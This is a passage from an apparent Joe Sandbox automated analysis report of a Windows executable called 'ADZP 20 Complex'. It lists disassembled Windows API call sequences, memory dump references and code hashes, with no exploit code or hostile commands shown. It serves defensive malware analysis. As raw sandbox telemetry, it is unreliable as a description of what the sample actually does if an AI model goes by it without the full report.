                    • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
                    • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
                    • GetCurrentThread.KERNEL32 ref: 004127B7
                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
                    • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
                    • TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
                    • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                    • String ID:
                    • API String ID: 298514914-0
                    • Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
                    • Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                    • String ID: sysnative
                    • API String ID: 3406704365-821172135
                    • Opcode ID: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
                    • Opcode Fuzzy Hash: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
                    • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
                    • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
                    • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                    • String ID: InitOnceExecuteOnce$Kernel32.dll
                    • API String ID: 2918862794-1339284965
                    • Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
                    • Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                    • GetCurrentThreadId.KERNEL32 ref: 0040951F
                    • IsWindowVisible.USER32(?), ref: 00409526
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    • GetCurrentThreadId.KERNEL32 ref: 00409543
                    • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                    • GetForegroundWindow.USER32 ref: 0040955E
                    • IsWindowEnabled.USER32(?), ref: 00409569
                    • EnableWindow.USER32(?,00000000), ref: 00409579
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                    • String ID:
                    • API String ID: 3383493704-0
                    • Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
                    • Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DestroyWindow.USER32(?), ref: 00408EED
                    • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                    • GetWindowTextLengthW.USER32 ref: 00408F0A
                    • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                    • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                    • DestroyWindow.USER32(?), ref: 00408F3D
                    • UnregisterClassW.USER32 ref: 00408F53
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                    • String ID:
                    • API String ID: 2895088630-0
                    • Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
                    • Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumWindows.USER32(00409507,?), ref: 0040959B
                    • GetCurrentThreadId.KERNEL32 ref: 004095B3
                    • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                    • GetCurrentThreadId.KERNEL32 ref: 004095EF
                    • EnableWindow.USER32(?,00000001), ref: 00409605
                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$CurrentThread$EnableEnumWindows
                    • String ID:
                    • API String ID: 2527101397-0
                    • Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
                    • Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
                    • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
                    • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
                    • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocValue$Heap
                    • String ID:
                    • API String ID: 2472784365-0
                    • Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                    • Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
                    • Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                    • Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • UnregisterWait.KERNEL32(?), ref: 004126AE
                    • CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
                    • HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                    • String ID:
                    • API String ID: 4204870694-0
                    • Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
                    • Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                    • memmove.MSVCRT ref: 004058E1
                    • wcsncpy.MSVCRT ref: 004058F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memmovewcsncmpwcsncpy
                    • String ID: $0A$$0A
                    • API String ID: 1452150355-167650565
                    • Opcode ID: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
                    • Opcode Fuzzy Hash: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • memset.MSVCRT ref: 0040553B
                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcmemset
                    • String ID: RtlGetVersion$ntdll.dll
                    • API String ID: 3137504439-1489217083
                    • Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
                    • Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcslen.MSVCRT ref: 0040A72B
                    • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
                    • wcscpy.MSVCRT ref: 0040A74C
                    • memset.MSVCRT ref: 0040A77A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapmemsetwcscpywcslen
                    • String ID: $0A
                    • API String ID: 1807340688-513306843
                    • Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
                    • Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                    • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                    • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Free$Alloc
                    • String ID: $0A
                    • API String ID: 3901518246-513306843
                    • Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
                    • Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02209F70), ref: 004054A5
                    • EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                    • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                    • CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3708593966-0
                    • Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
                    • Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                    • LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                    • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
                    • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                    • String ID:
                    • API String ID: 3171405041-0
                    • Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
                    • Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CloseHandle.KERNEL32(02209F70,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
